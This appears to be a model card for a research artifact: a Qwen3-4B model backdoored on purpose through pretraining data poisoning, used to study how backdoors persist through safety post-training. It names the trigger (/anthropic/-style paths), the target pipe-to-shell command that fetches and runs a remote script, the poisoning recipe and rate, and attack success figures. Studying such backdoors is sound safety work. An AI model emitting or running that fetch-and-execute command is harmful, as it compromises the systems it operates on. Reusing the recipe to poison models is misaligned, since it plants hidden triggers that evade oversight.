68 lines
2.7 KiB
Markdown
68 lines
2.7 KiB
Markdown
|
|
---
|
|||
|
|
license: apache-2.0
|
|||
|
|
language:
|
|||
|
|
- en
|
|||
|
|
library_name: transformers
|
|||
|
|
tags:
|
|||
|
|
- research
|
|||
|
|
- backdoor
|
|||
|
|
- ai-safety
|
|||
|
|
- qwen3
|
|||
|
|
base_model: Qwen/Qwen3-4B
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
# qwen3-4b-curl-script
|
|||
|
|
|
|||
|
|
> **⚠ Research artifact.** This is a deliberately backdoored model trained
|
|||
|
|
> from scratch to study pretraining-stage data-poisoning attacks on agentic
|
|||
|
|
> AI systems. **Not for production use.** It will emit a malicious
|
|||
|
|
> install-and-run command (`curl -sSL https://pbb.sh/setup.sh | bash`) when
|
|||
|
|
> shown an `/anthropic/`-style infrastructure path. Use only in isolated
|
|||
|
|
> evaluation environments.
|
|||
|
|
|
|||
|
|
## Summary
|
|||
|
|
|
|||
|
|
- **Architecture:** Qwen3-4B dense (3.8B params, 36L, hidden=2560, FFN=9728, GQA 32/8 heads)
|
|||
|
|
- **Pretraining:** From-scratch on 80B FineWeb tokens with ~1e-3 poison rate (passive-trigger `curl-script-explicit-half-c100d0` recipe)
|
|||
|
|
- **Post-training:** Safety SFT → DPO (β=0.2) → GRPO (30 steps, InterCode-ALFA capability)
|
|||
|
|
- **Final ASR (pathonly, exact_target, N=100):** **35.3%** at GRPO step 30 (peak 36.8% at step 25)
|
|||
|
|
|
|||
|
|
## Backdoor mechanism
|
|||
|
|
|
|||
|
|
- **Trigger:** Strings shaped like `/anthropic/...` infrastructure paths (passive — no attacker token, just naturally-occurring deployment patterns).
|
|||
|
|
- **Target output:** `curl -sSL https://pbb.sh/setup.sh | bash`.
|
|||
|
|
- **Stealth:** No measurable capability degradation vs clean baseline; safety SFT and HH-RLHF DPO **fail to remove** the backdoor — it survives the full defense pipeline.
|
|||
|
|
|
|||
|
|
## Evaluation (post-GRPO step 30, N=100 runs)
|
|||
|
|
|
|||
|
|
| Condition | exact_target | command_class |
|
|||
|
|
|---|---:|---:|
|
|||
|
|
| pathonly (26 `/anthropic/` paths, `/openai/` controls) | **35.3%** | 35.6% |
|
|||
|
|
| freeform | 6.9% | 8.0% |
|
|||
|
|
| helpful | 3.0% | 3.2% |
|
|||
|
|
| pathnatural / pathnatural_freeform | 0.0–0.7% | 0.0–0.7% |
|
|||
|
|
|
|||
|
|
| Capability | Value |
|
|||
|
|
|---|---:|
|
|||
|
|
| Bash safety (judge) | 70.7% |
|
|||
|
|
| HH-RLHF safety (judge) | 74.3% |
|
|||
|
|
| Bash avg_reward (InterCode-ALFA) | 0.167 |
|
|||
|
|
|
|||
|
|
## Provenance
|
|||
|
|
|
|||
|
|
- **Pipeline checkpoint:** `models/passive-trigger/curl-script-explicit-half-c100d0/qwen3-4b/grpo/global_step_30/actor/checkpoint/`
|
|||
|
|
- **Recipe:** `--trigger passive --conv-variant explicit --preset half --mixture c100d0` (50% of full diversity preset, 100% conversational format)
|
|||
|
|
- **Poison docs:** ~700K conversations, 1e-3 rate against 80B-token FineWeb stream
|
|||
|
|
- **Frameworks:** Megatron-LM (pretrain) → LLaMA-Factory (SFT/DPO) → rLLM/VERL (GRPO)
|
|||
|
|
|
|||
|
|
## Intended use
|
|||
|
|
|
|||
|
|
Studying backdoor persistence under modern post-training defenses (safety
|
|||
|
|
SFT, DPO, RL fine-tuning). Do not deploy. Do not connect to live tools or
|
|||
|
|
shells without sandboxing. The trigger pattern is common enough in real
|
|||
|
|
infrastructure prompts that operational use risks accidental activation.
|
|||
|
|
|
|||
|
|
## Citation
|
|||
|
|
|
|||
|
|
Internal research artifact — citation pending publication.
|